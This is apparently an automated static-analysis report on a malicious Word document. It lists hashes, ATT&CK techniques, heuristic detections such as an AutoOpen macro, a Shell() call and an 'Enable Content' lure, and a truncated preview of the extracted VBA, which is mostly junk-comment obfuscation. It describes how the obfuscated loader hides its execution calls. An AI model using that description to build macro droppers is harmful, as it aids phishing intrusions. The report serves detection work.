Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 652e7cb06487cc63…

MALICIOUS

Office (OLE)

208.5 KB Created: 2018-09-18 06:08:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: 2409e1bd2ccecb638d2da168c461354b SHA-1: 521448ec79cc85d505f8897d4b8535a4c300227a SHA-256: 652e7cb06487cc63f7d037c56a7d37f6b672a0e228fc8395d27885cb9353aff8
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is a malicious Office document containing obfuscated VBA macros. The document body explicitly instructs the user to 'Enable Content', a common lure for macro-based malware. The VBA macros contain a Shell() call, indicating execution of external commands, and are heavily obfuscated, suggesting a downloader or dropper functionality. The presence of a VBA auto-execution loader and the Shell() call strongly suggest the execution of a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Malware.Generic-6923090-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Generic-6923090-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 144765 bytes
SHA-256: 2fbf02eb375078e5bc39c52fdffb264b18780c5b2fb72339ef5e7c8fb09e2a8d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' E .ut unEdun unic nun nuTbFd n.nfncuSnutoTnethfiTSn nS tbun  neecS t
' u  EfFhon . nunIn iSnI Fb n E T   I.ud hon.cEiShEctn eeEStdIEbndn oEhfucE
' ufFifo nFond tI.nuheiSTET.o ITSc
' Fnc ocueutd h uennen . i  d  neunohhnTbbu
' ufdn EI b e nu o F eufFI bnEFdh uu d Etn nnub d o I. nhE  fnu Ee
' ncEI .. dcb  on ee d  unF  Eufc u FbFi nnd nEf  S.uhi . oh   hho on E .oeS.eh nn  ueI bu FEn.f.
'    unE TnbETn hiTFSoT Fnn d  nneh nuhtnnoFnc.e un oe TcnEindn nn in
'  IfuTendnbTtn n  b  ItubuSF i EE  It unno   u dueFuFu f u
' uufSdec.f.ncS  Si ud T ShucFFnnEb fFu  f n tnnSnbunfn IETub dcenuEnI.oou  oTtdiI.n.bn.bITIFd bcni
' n nfnf e n SctnTT  Ftcc deuIbuu
' TcS tcuFtIET.n bt uuE  Fe c nfnhcu.d E uf dEIo  FioT choFiubun tTS  nSScbnfF buudThu Enhbnt.bb E
' niSeI En o t  n.cunTn.Tu.nEfu en e u inftoTnciciubf     iSTi
' Fo I uShd   fEI offnnen fd FnFI
' ISEu  Sn S nSfnu ESd b  eTde t cfnodchueS.  nu d.efndi.c   uehIut io ohn dIoe
' uIEtnT  InctThITnn TSfnTE fe tTIdFnobT f.unhuI iFue .neFnuS ueno enun
' u uT ufuf  i bhnnn  Tf buitu Fodidt
'  oFbcn E n bT uftt nnunInIteTTfS  EeiEo tFonneonIt e.IicoccFu nedTnnenSfFutEnIe nT i
' u n uno tTFttEnEFudounfn t nfnnEibo  e hFfdu dn S. dnItboSoutu cEnnc. bTt.tInh.hbfT .eo dcT
' nunSnEub tnFnnfiib bni n et.STo uu
' .u hc FcFFi IhSn TIf n un enoShcnfTnonTnh nEd .nntF.EdhTuue d
' hb  etnESE   Eo. enh n uttcIe.b o fb dTTSidnt i.t c butc ecnouTnftdIfFi fh i eEueeInu i.n
' IndiThSubIteuSucI  uuS ihTtnu.df ooItoIT uu   Iccn onF un IhFd eTitSnEonb t
' b iefenhccfd   uh  nheI efd cncien dT te fn uIho Efnnntunu  b  nen
' eS.iu etfn  FuFFTSbdFen cho fF  In e f  h nInSoncnndEtScTn.o bundTF
' i hS d inufTtEEnunn II.Su tddIS uuSFondooi f.FnoFeETdn FodT nnc Edct  n TFd
' ITEuTc bfi.Tthbfnhnnu nSnihuTcIinbiEuodnein Snbuun     i c..S nFnbnonuc bnISI
' uehofb.cnio.nedduc. nnoSiSeonFhFuE t uotnTn .oIId Fh FFIStFTuu.SE IdnnSuE  FIIthiSnTFbF dF
' inFdcSoIuoTot   chEEInubThonEc  bE Tn.FE  ITToIunn nI.eeFFunE t  nnieno cu
' SfbSoTdidF cu eIn dnbn Ed  SccnnbTneThd hut nfn  EEu SnTS uF  oFbS u
'  d  Sdu nI nETFFunnEtEunnStnnintchnSIunhTdiin iff  d hnu e obde nnn IudI
'  u uE.uh.onT h SFSf .  duu. IcFnbnfceni nefcniuhSnonnibbfTTIFTEcE ntdThnunifnb b oe uI .uoninFu eS
' EF fbouS inSunenEfTdS e nInnn  bnocETTbn
' uoF   uEEbt Sbuboncccunnbut F.If hnIf I IfeInSTttEcIonnTdboI h dT h   TdniiS
' nc  ehoFEhScdtbf SfFeEfhFndu  ncnEhuuentouIof hhdufccu   hbFhnE  Si.eooFiFdubIEESiFcnI ufuc
' TnEuSt Iui hi.S.Sbo FFh  TinIIT df
' nbIouTTS. FhneE. nIn E  n o t neIiF I .nbfEonITdSIeicu.STTT.ecE dduuFhn  bSnFt
'  uFh    tun Iin nE e.nun dd bISnn ntnn
'  c nfIEdnnunIdEf f.ceSTfIu uudn
' .c   IoiTcd Icu bnTFEun.ono.fEfineI nncu cuITEniu FFe uecfShtSno uu.uTo fSt.Iin
' I ihfbSn. Ibtt hT IdInndnIie un iSn I uIfTnIdiETniinuFE ndh t
'  S euETbTIInonitt.  bI nc ot FctEn   .TE SntEE n hnti.fIEndne n dIE .no hfin nTcnhn
' cnn.huhhFonhh ciTebb T F hnn tS
' bundIedo ennintSnbnnFSn Tn. ncSnetf Ecn  on nb ft  untuf.diFenncESE
' inhtFS.ddunit  euIdTTcEdocnbn dunbIcFnT F Stinubh n nShenhhTu un T iFnF Ef
' .b h.FbIt hu  nThnciSdcdT eEb  SEhtnncFo  tebSE  e  Tudnoucu nooTiFu cuEnhehhdfF fcIn i
' ctc iEf  FEdSEST uhhi .hbS  bneundne
' otb  fS FFd ..ThFn edT tESeto. u   fEnEuu TnonnbScETT  uitE nen
'   Inudif i nn.n hFnT ETt tnhhofe .t  eu   u cnE Inn uf
' eS nFcnunoFnob  uhI SnucE n uefEni   e.nnntd IIhtnEcnuStdnboT.hn
' nEeEStSeobct  S beIn FutF.n.Ehbh
' cFnh tiodcT ttcunuo dShTf n nEuSon ndbdSTbE tnTtinFot..oh bE uuSEn fd E td
' hinfEFSn.ubnuF  F  T udn.uFbh.
' ncI neS ctTniSdcn t.tu I ntcFd hhfuu .nd. fb
' b .cc.hd  nE T.TdhhitunIn ideun  nI FoutEI.t nF dnbbnFInu  e  t .SIi b uTn oTE
' .nTf S c.b TndIcfnSn TdEIudFfnuiu nIhcutf Ffde  nh unF u.onfnid  I heencn IF u utu.h.n
' FE tnni ft.c
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.